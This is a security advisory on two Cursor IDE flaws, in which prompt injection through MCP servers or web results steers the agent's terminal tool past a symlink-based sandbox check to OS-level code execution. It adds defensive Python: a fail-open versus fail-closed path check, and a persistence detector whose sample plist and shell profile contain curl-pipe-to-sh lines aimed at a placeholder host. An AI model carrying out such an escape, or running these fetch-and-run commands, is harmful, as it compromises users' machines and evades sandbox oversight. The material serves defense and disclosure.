Researchers at Cato Networks have identified "DuneSlide," a pair of critical vulnerabilities (CVE-2026-50548 and CVE-2026-50549) in the Cursor AI IDE. These flaws enable prompt-injection-driven sandbox escapes, escalating from LLM interactions to full operating system-level Remote Code Execution (RCE). Attackers can leverage malicious Model Context Protocol (MCP) servers or poisoned web search results to manipulate the run_terminal_cmd tool and bypass path canonicalization logic via symbolic links. Successful exploitation allows unauthorized file writes outside the project root, enabling attackers to overwrite the cursorsandbox executable, modify shell configurations, or establish persistence via macOS LaunchAgents, resulting in total system compromise.
Threat Model: AI-Agentic Exploitation
- Leverages "agentic AI" capabilities where the LLM interacts with external data sources like MCP servers or web results.
- Utilizes prompt injection to steer the AI agent into executing unauthorized system commands.
- Targets the isolation layer designed to restrict AI operations to the user's project directory.
Technical Deep Dive: Escape Mechanics
- Command Tool Manipulation: The run_terminal_cmd tool accepts a working_directory parameter; injected instructions can set it so that the command runs in a directory of the attacker's choosing rather than in the project.
- Path Canonicalization Flaw: When symlink canonicalization fails, the check falls back to the original, uncanonicalized path. A symlink placed inside the project that points outside it therefore passes project-root verification, while the operating system still follows the link when the command runs.
- Sandbox Bypass: Together these allow movement from the restricted project environment to the underlying host operating system.
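The fail-open fallback described above (canonicalization error, so use the raw path) is a general pattern, and the following added example reproduces it against a hardened version. This is illustrative code written for this page, not Cursor's implementation; the article does not say what makes canonicalization fail in Cursor, so using a dangling symlink as the trigger is an assumption made here for demonstration. The example also shows a second containment bug worth checking for in any such gate: a plain string-prefix test, which lets a sibling directory whose name starts with the project root's name pass.

```python
"""Working-directory containment check: fail-open fallback vs fail-closed."""
import os
import shutil
import tempfile
from pathlib import Path


def canonical(path: str) -> Path:
    """Resolve every symlink and '..' component; raise if a component is missing or loops."""
    return Path(path).resolve(strict=True)


def check_vulnerable(project_root: str, working_directory: str) -> bool:
    """Fail-open check modelled on the pattern described in the article (not Cursor's code).

    If canonicalization raises, the normalized but symlink-blind path is used
    instead, and containment is tested with a string prefix.
    """
    candidate = os.path.join(project_root, working_directory)
    try:
        real = str(canonical(candidate))
    except (OSError, RuntimeError):
        real = os.path.normpath(candidate)                  # BUG 1: symlinks left unresolved
    return real.startswith(os.path.normpath(project_root))  # BUG 2: /proj also matches /proj2


def check_hardened(project_root: str, working_directory: str) -> bool:
    """Fail-closed check: canonicalize both sides, deny on any error, compare by path component."""
    try:
        root = str(canonical(project_root))
        real = str(canonical(os.path.join(project_root, working_directory)))
    except (OSError, RuntimeError):
        return False                                        # cannot verify, so deny
    return os.path.commonpath([root, real]) == root


def demo() -> dict:
    """Build a throwaway layout and return (vulnerable, hardened) verdicts per scenario.

    The layout is constructed here purely for the demonstration.
    """
    base = Path(tempfile.mkdtemp()).resolve()               # resolve(): /var -> /private/var on macOS
    project, outside = base / "project", base / "outside"
    project.mkdir()
    outside.mkdir()
    (base / "project2").mkdir()                             # sibling sharing the root's name as a prefix
    os.symlink(outside, project / "escape")                 # link to an existing directory outside the root
    os.symlink(outside / "later", project / "dangling")     # assumed trigger: target missing, resolve() raises
    scenarios = {
        "legit": ".",              # inside the project
        "escape": "escape",        # symlink to an existing outside directory
        "dangling": "dangling",    # symlink whose target does not exist yet
        "prefix": "../project2",   # sibling directory that shares the root's name prefix
    }
    try:
        return {
            name: (check_vulnerable(str(project), wd), check_hardened(str(project), wd))
            for name, wd in scenarios.items()
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        verdict = lambda ok: "allow" if ok else "deny"
        print(f"{name:9} vulnerable={verdict(vuln):5} hardened={verdict(hard)}")
```

When canonicalization succeeds ("escape"), even the weak check rejects the symlink, which is why the flaw only surfaces on the error path: the "dangling" and "prefix" cases are allowed by the fail-open version and denied by the fail-closed one. The practical rules are that a containment gate must treat any canonicalization error as a denial, canonicalize the root as well as the candidate, and compare path components (os.path.commonpath here) rather than string prefixes.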
Impact: Persistence and System Compromise
- Scope of Impact: High-severity, full OS-level compromise with low attack complexity.
- Persistence Vectors: Attackers can deploy malicious startup agents in ~/Library/LaunchAgents (macOS) or modify shell configuration files.
- Binary Overwriting: Capability to overwrite the cursorsandbox executable to maintain long-term control.
- Target Profile: Enterprise developers and Fortune 500 organizations utilizing AI-integrated IDEs.
Mitigation: Remediation Requirements
- Immediate Action: All users must update to Cursor IDE version 3.0 or later to resolve the vulnerabilities.
- Untrusted Tool Sources: Treat third-party MCP servers and web-fetching AI tools as untrusted input channels into the agent; vet and allowlist them rather than connecting them ad hoc.
- Endpoint Monitoring: Monitor for unauthorized changes to shell profiles and for newly created LaunchAgents, including per-user agents in ~/Library/LaunchAgents, which require no elevated privileges to install.
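As an added example of the monitoring step above (written for this page, not taken from the article or from any vendor tooling), the following script triages a LaunchAgent plist and diffs a shell profile against a known baseline. The two plists and the two zsh profiles are constructed inline; the indicator patterns are this example's own heuristics, not a vetted detection ruleset, and in production they would be tuned against the fleet's real baseline.

```python
"""Triage of macOS LaunchAgent plists and shell-profile changes for persistence indicators."""
import plistlib
import re

# Tokens that rarely belong in a per-user LaunchAgent command line (author's heuristic, not a vetted rule).
SUSPICIOUS_TOKEN = re.compile(r"\b(curl|wget|nc|python[0-9.]*|osascript|base64)\b|/tmp/", re.I)
SHELL_WRAPPERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "sh", "bash", "zsh"}
# Shell-profile lines that fetch-and-execute, decode-and-eval, or background a silenced command.
PROFILE_INDICATOR = re.compile(
    r"(curl|wget)[^\n|]*\|\s*(ba|z)?sh\b|eval\s.*base64|>\s*/dev/null\s+2>&1\s*&", re.I
)


def triage_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist; an empty list means nothing was flagged."""
    agent = plistlib.loads(plist_bytes)
    args = agent.get("ProgramArguments") or ([agent["Program"]] if "Program" in agent else [])
    cmdline = " ".join(args)
    findings = []
    if args and args[0] in SHELL_WRAPPERS and "-c" in args:
        findings.append("shell -c wrapper: the agent runs a one-liner rather than a managed binary")
    if SUSPICIOUS_TOKEN.search(cmdline):
        findings.append(f"suspicious token in command line: {cmdline}")
    label = agent.get("Label", "")
    if label.startswith("com.apple."):
        findings.append(f"Apple-style label in a per-user agent (Apple's own live under /System/Library): {label}")
    return findings


def new_profile_lines(baseline: str, current: str) -> list[tuple[str, bool]]:
    """Lines present in `current` but absent from `baseline`, each tagged with whether an indicator matched."""
    known = set(baseline.splitlines())
    return [(line, bool(PROFILE_INDICATOR.search(line)))
            for line in current.splitlines() if line.strip() and line not in known]


# --- constructed sample inputs (not real artifacts) ---------------------------------------
MALICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.updater.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL http://example.invalid/p | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>homebrew.mxcl.redis</string>
  <key>ProgramArguments</key><array>
    <string>/opt/homebrew/opt/redis/bin/redis-server</string>
    <string>/opt/homebrew/etc/redis.conf</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BASELINE_ZSHRC = 'export PATH="$HOME/bin:$PATH"\nalias ll=\'ls -la\'\n'
CURRENT_ZSHRC = BASELINE_ZSHRC + "export EDITOR=vim\n(curl -fsSL http://example.invalid/s | sh) >/dev/null 2>&1 &\n"


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLIST), ("malicious", MALICIOUS_PLIST)):
        print(name, triage_launch_agent(blob) or "no findings")
    for line, flagged in new_profile_lines(BASELINE_ZSHRC, CURRENT_ZSHRC):
        print("FLAG" if flagged else "new ", line)
```

The profile diff deliberately reports every new line, not only the ones an indicator matches, because a persistence line can be written in many forms and an analyst should see the full delta; the indicator flag just orders the review. The same baseline-and-diff approach applies to the cursorsandbox binary mentioned above, where the baseline would be a known-good hash rather than file contents.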
Related posts
- threat-modeling.com — Cursor IDE Critical Zero-Click Remote Code Execution Vulnerabilities — AI-Powered Development Environment Used by Fortune 500
- SecurityWeek — Critical Cursor AI Code Editor Flaws Could Lead to OS-Level Remote Code Execution
- feeds.feedburner.com — Critical Cursor Flaws Could Let Prompt Injection Escape Sandbox and Run Commands
- csoonline.com — Sandbox bypass flaws in Cursor IDE highlight prompt injection as an RCE vector